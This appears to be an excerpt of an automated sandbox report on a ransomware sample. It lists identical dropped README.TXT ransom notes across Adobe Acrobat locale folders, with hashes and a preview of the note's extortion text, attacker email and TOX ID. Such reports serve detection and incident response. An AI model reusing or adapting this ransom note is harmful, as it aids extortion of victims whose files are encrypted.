                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

